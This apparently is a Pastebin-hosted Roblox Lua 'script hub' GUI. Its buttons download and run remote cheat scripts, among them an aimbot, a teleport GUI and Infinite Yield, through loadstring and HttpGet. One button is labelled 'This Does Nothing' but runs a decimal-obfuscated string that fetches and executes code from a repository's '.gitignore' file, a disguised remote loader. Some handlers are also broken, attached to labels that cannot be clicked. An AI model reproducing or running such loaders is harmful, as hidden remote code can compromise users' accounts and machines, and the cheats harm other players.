ExodiaForce

My Script Hub

Feb 27th, 2023 (edited)
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.39 KB | Source Code | 0 0
  1. local ScreenGui = Instance.new("ScreenGui")
  2. local Main = Instance.new("Frame")
  3. local CloseBUTTON = Instance.new("TextLabel")
  4. local CreditsAndMore = Instance.new("TextLabel")
  5. local MM2 = Instance.new("TextLabel")
  6. local OwlHubBUTTON = Instance.new("TextButton")
  7. local Scripts = Instance.new("TextLabel")
  8. local LINE = Instance.new("TextLabel")
  9. local LINE2 = Instance.new("TextLabel")
  10. local InfYieldBUTTON = Instance.new("TextButton")
  11. local RevizV2BUTTON = Instance.new("TextButton")
  12. local StormHubBUTTON = Instance.new("TextButton")
  13. local EclipseGUIBUTTON = Instance.new("TextButton")
  14. local VynixuGUIBUTTON = Instance.new("TextButton")
  15. local MM2AdminPanelBUTTON = Instance.new("TextButton")
  16. local IDKJustAScriptBUTTON = Instance.new("TextButton")
  17. local Creditsandmore1 = Instance.new("TextLabel")
  18. local Creditsandmore2 = Instance.new("TextLabel")
  19. local Creditsandmore3 = Instance.new("TextLabel")
  20. local TextButton = Instance.new("TextButton")
  21.  
  22. --Properties:
  23.  
  24. ScreenGui.Parent = game.CoreGui
  25.  
  26. Main.Name = "Main"
  27. Main.Parent = ScreenGui
  28. Main.BackgroundColor3 = Color3.fromRGB(52, 10, 67)
  29. Main.Position = UDim2.new(0.265741736, 0, 0.327073544, 0)
  30. Main.Size = UDim2.new(0, 457, 0, 252)
  31. Main.Active = true
  32. Main.Draggable = true
  33.  
  34. CloseBUTTON.Name = "CloseBUTTON"
  35. CloseBUTTON.Parent = Main
  36. CloseBUTTON.BackgroundColor3 = Color3.fromRGB(87, 42, 235)
  37. CloseBUTTON.Position = UDim2.new(-0.00121667981, 0, -0.00229153037, 0)
  38. CloseBUTTON.Size = UDim2.new(0, 457, 0, 34)
  39. CloseBUTTON.Font = Enum.Font.SourceSans
  40. CloseBUTTON.Text = "Exodia's Script Hub"
  41. CloseBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  42. CloseBUTTON.TextSize = 24.000
  43.  
  44. CreditsAndMore.Name = "CreditsAndMore"
  45. CreditsAndMore.Parent = Main
  46. CreditsAndMore.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  47. CreditsAndMore.Position = UDim2.new(0.671461761, 0, 0.182372078, 0)
  48. CreditsAndMore.Size = UDim2.new(0, 149, 0, 21)
  49. CreditsAndMore.Font = Enum.Font.SourceSans
  50. CreditsAndMore.Text = "Idk"
  51. CreditsAndMore.TextColor3 = Color3.fromRGB(0, 0, 0)
  52. CreditsAndMore.TextSize = 14.000
  53.  
  54.  
  55. MM2.Name = "MM2"
  56. MM2.Parent = Main
  57. MM2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  58. MM2.Position = UDim2.new(0.314787805, 0, 0.182372078, 0)
  59. MM2.Size = UDim2.new(0, 163, 0, 21)
  60. MM2.Font = Enum.Font.SourceSans
  61. MM2.Text = "Doors"
  62. MM2.TextColor3 = Color3.fromRGB(0, 0, 0)
  63. MM2.TextSize = 14.000
  64.  
  65. OwlHubBUTTON.Name = "OwlHubBUTTON"
  66. OwlHubBUTTON.Parent = Main
  67. OwlHubBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  68. OwlHubBUTTON.Position = UDim2.new(0.0670116618, 0, 0.323999554, 0)
  69. OwlHubBUTTON.Size = UDim2.new(0, 80, 0, 30)
  70. OwlHubBUTTON.Font = Enum.Font.SourceSans
  71. OwlHubBUTTON.Text = "Walk On Walls"
  72. OwlHubBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  73. OwlHubBUTTON.TextSize = 14.000
  74. OwlHubBUTTON.MouseButton1Down:connect(function()
  75. loadstring(game:HttpGet("https://pastebin.com/raw/2UQeLsLu", true))();
  76. end)
  77.  
  78. Scripts.Name = "Scripts"
  79. Scripts.Parent = Main
  80. Scripts.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  81. Scripts.Position = UDim2.new(-0.00121667981, 0, 0.180807054, 0)
  82. Scripts.Size = UDim2.new(0, 144, 0, 21)
  83. Scripts.Font = Enum.Font.SourceSans
  84. Scripts.Text = "Crocs"
  85. Scripts.TextColor3 = Color3.fromRGB(0, 0, 0)
  86. Scripts.TextSize = 14.000
  87.  
  88. LINE.Name = "LINE"
  89. LINE.Parent = Main
  90. LINE.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  91. LINE.Position = UDim2.new(0.312910259, 0, 0.261904746, 0)
  92. LINE.Size = UDim2.new(0, 1, 0, 185)
  93. LINE.Font = Enum.Font.SourceSans
  94. LINE.Text = ""
  95. LINE.TextColor3 = Color3.fromRGB(0, 0, 0)
  96. LINE.TextSize = 14.000
  97.  
  98. LINE2.Name = "LINE2"
  99. LINE2.Parent = Main
  100. LINE2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  101. LINE2.Position = UDim2.new(0.669584215, 0, 0.265873015, 0)
  102. LINE2.Size = UDim2.new(0, 1, 0, 185)
  103. LINE2.Font = Enum.Font.SourceSans
  104. LINE2.Text = ""
  105. LINE2.TextColor3 = Color3.fromRGB(0, 0, 0)
  106. LINE2.TextSize = 14.000
  107.  
  108. InfYieldBUTTON.Name = "InfYieldBUTTON"
  109. InfYieldBUTTON.Parent = Main
  110. InfYieldBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  111. InfYieldBUTTON.Position = UDim2.new(0.0670116618, 0, 0.494634479, 0)
  112. InfYieldBUTTON.Size = UDim2.new(0, 80, 0, 30)
  113. InfYieldBUTTON.Font = Enum.Font.SourceSans
  114. InfYieldBUTTON.Text = "Infinite Yield"
  115. InfYieldBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  116. InfYieldBUTTON.TextSize = 14.000
  117. InfYieldBUTTON.MouseButton1Down:connect(function()
  118. loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
  119. end)
  120.  
  121. RevizV2BUTTON.Name = "RevizV2BUTTON"
  122. RevizV2BUTTON.Parent = Main
  123. RevizV2BUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  124. RevizV2BUTTON.Position = UDim2.new(0.0670116618, 0, 0.661301136, 0)
  125. RevizV2BUTTON.Size = UDim2.new(0, 80, 0, 30)
  126. RevizV2BUTTON.Font = Enum.Font.SourceSans
  127. RevizV2BUTTON.Text = "Aimbot"
  128. RevizV2BUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  129. RevizV2BUTTON.TextSize = 14.000
  130. RevizV2BUTTON.MouseButton1Down:connect(function()
  131. loadstring(game:HttpGet("https://pastebin.com/raw/GtuUcQXU", true))()
  132. end)
  133.  
  134. StormHubBUTTON.Name = "StormHubBUTTON"
  135. StormHubBUTTON.Parent = Main
  136. StormHubBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  137. StormHubBUTTON.Position = UDim2.new(0.0670116618, 0, 0.831936061, 0)
  138. StormHubBUTTON.Size = UDim2.new(0, 80, 0, 30)
  139. StormHubBUTTON.Font = Enum.Font.SourceSans
  140. StormHubBUTTON.Text = "Teleport Gui"
  141. StormHubBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  142. StormHubBUTTON.TextSize = 14.000
  143. StormHubBUTTON.MouseButton1Down:connect(function()
  144. loadstring(game:GetObjects("rbxassetid://4001118261")[1].Source)()
  145. end)
  146.  
  147. EclipseGUIBUTTON.Name = "EclipseGUIBUTTON"
  148. EclipseGUIBUTTON.Parent = Main
  149. EclipseGUIBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  150. EclipseGUIBUTTON.Position = UDim2.new(0.349287361, 0, 0.323999554, 0)
  151. EclipseGUIBUTTON.Size = UDim2.new(0, 135, 0, 30)
  152. EclipseGUIBUTTON.Font = Enum.Font.SourceSans
  153. EclipseGUIBUTTON.Text = "Entity Replicator"
  154. EclipseGUIBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  155. EclipseGUIBUTTON.TextSize = 14.000
  156. EclipseGUIBUTTON.MouseButton1Down:connect(function()
  157. loadstring(game:HttpGet"https://raw.githubusercontent.com/sponguss/Doors-Entity-Replicator/main/source.lua")()
  158. end)
  159.  
  160. VynixuGUIBUTTON.Name = "VynixuGUIBUTTON"
  161. VynixuGUIBUTTON.Parent = Main
  162. VynixuGUIBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  163. VynixuGUIBUTTON.Position = UDim2.new(0.349287361, 0, 0.443047166, 0)
  164. VynixuGUIBUTTON.Size = UDim2.new(0, 135, 0, 30)
  165. VynixuGUIBUTTON.Font = Enum.Font.SourceSans
  166. VynixuGUIBUTTON.Text = "Vynixu GUI"
  167. VynixuGUIBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  168. VynixuGUIBUTTON.TextSize = 14.000
  169. VynixuGUIBUTTON.MouseButton1Down:connect(function()
  170. loadstring(game:GetObjects("rbxassetid://4001118261")[1].Source)()
  171. end)
  172.  
  173. MM2AdminPanelBUTTON.Name = "MM2AdminPanelBUTTON"
  174. MM2AdminPanelBUTTON.Parent = Main
  175. MM2AdminPanelBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  176. MM2AdminPanelBUTTON.Position = UDim2.new(0.349287361, 0, 0.562094748, 0)
  177. MM2AdminPanelBUTTON.Size = UDim2.new(0, 135, 0, 30)
  178. MM2AdminPanelBUTTON.Font = Enum.Font.SourceSans
  179. MM2AdminPanelBUTTON.Text = "Vynixiu's Doors GUI"
  180. MM2AdminPanelBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  181. MM2AdminPanelBUTTON.TextSize = 14.000
  182. MM2AdminPanelBUTTON.MouseButton1Down:connect(function()
  183. loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Vynixius/main/Loader.lua"))()
  184. end)
  185.  
  186. IDKJustAScriptBUTTON.Name = "IDKJustAScriptBUTTON"
  187. IDKJustAScriptBUTTON.Parent = Main
  188. IDKJustAScriptBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  189. IDKJustAScriptBUTTON.Position = UDim2.new(0.349287361, 0, 0.68114239, 0)
  190. IDKJustAScriptBUTTON.Size = UDim2.new(0, 135, 0, 30)
  191. IDKJustAScriptBUTTON.Font = Enum.Font.SourceSans
  192. IDKJustAScriptBUTTON.Text = "This Does Nothing"
  193. IDKJustAScriptBUTTON.TextColor3 = Color3.fromRGB(0, 0, 0)
  194. IDKJustAScriptBUTTON.TextSize = 14.000
  195. IDKJustAScriptBUTTON.MouseButton1Down:connect(function()
  196. pcall(function()
  197. if not game:IsLoaded() then
  198. repeat
  199. wait()
  200. until game:IsLoaded()
  201. end
  202. if game:IsLoaded() then
  203. for Valiant=1,1 do
  204. wait()
  205. loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\86\97\110\105\115\50\53\50\47\118\97\108\105\97\110\116\47\109\97\105\110\47\46\103\105\116\105\103\110\111\114\101\39\41\44\32\116\114\117\101\41\41\40\41\10")()
  206. end
  207. end
  208. end)
  209. end)
  210.  
  211. Creditsandmore1.Name = "Creditsandmore1"
  212. Creditsandmore1.Parent = Main
  213. Creditsandmore1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  214. Creditsandmore1.Position = UDim2.new(0.687089682, 0, 0.322881788, 0)
  215. Creditsandmore1.Size = UDim2.new(0, 134, 0, 50)
  216. Creditsandmore1.Font = Enum.Font.SourceSans
  217. Creditsandmore1.Text = "V1.2: Added Unfair Hub Script"
  218. Creditsandmore1.TextColor3 = Color3.fromRGB(0, 0, 0)
  219. Creditsandmore1.TextSize = 14.000
  220. Creditsandmore1.MouseButton1Down:connect(function()
  221. loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
  222. end)
  223.  
  224. Creditsandmore2.Name = "Creditsandmore2"
  225. Creditsandmore2.Parent = Main
  226. Creditsandmore2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  227. Creditsandmore2.Position = UDim2.new(0.687089682, 0, 0.521294475, 0)
  228. Creditsandmore2.Size = UDim2.new(0, 134, 0, 50)
  229. Creditsandmore2.Font = Enum.Font.SourceSans
  230. Creditsandmore2.Text = "Made By Exodia"
  231. Creditsandmore2.TextColor3 = Color3.fromRGB(0, 0, 0)
  232. Creditsandmore2.TextSize = 12.000
  233.  
  234. Creditsandmore3.Name = ""
  235. Creditsandmore3.Parent = Main
  236. Creditsandmore3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  237. Creditsandmore3.Position = UDim2.new(0.687089682, 0, 0.719707191, 0)
  238. Creditsandmore3.Size = UDim2.new(0, 134, 0, 50)
  239. Creditsandmore3.Font = Enum.Font.SourceSans
  240. Creditsandmore3.Text = "In Development..."
  241. Creditsandmore3.TextColor3 = Color3.fromRGB(0, 0, 0)
  242. Creditsandmore3.TextSize = 20.000
  243.  
  244. TextButton.Parent = Main
  245. TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  246. TextButton.Position = UDim2.new(0.918602824, 0, -0.00319522619, 0)
  247. TextButton.Size = UDim2.new(0, 36, 0, 34)
  248. TextButton.Font = Enum.Font.SourceSans
  249. TextButton.Text = "X"
  250. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  251. TextButton.TextSize = 30.000
  252.  
  253. -- Scripts:
  254.  
  255. local function KYNEM_fake_script() -- CloseBUTTON.Script
  256. local script = Instance.new('Script', CloseBUTTON)
  257.  
  258. script.Parent.MouseButton1Click:Connect(function()
  259. game.Players.LocalPlayer.PlayerGui.ScreenGui.Frame.Visible = false
  260. end)
  261. end
  262. coroutine.wrap(KYNEM_fake_script)()
Tags: Roblox
Add Comment
Please, Sign In to add comment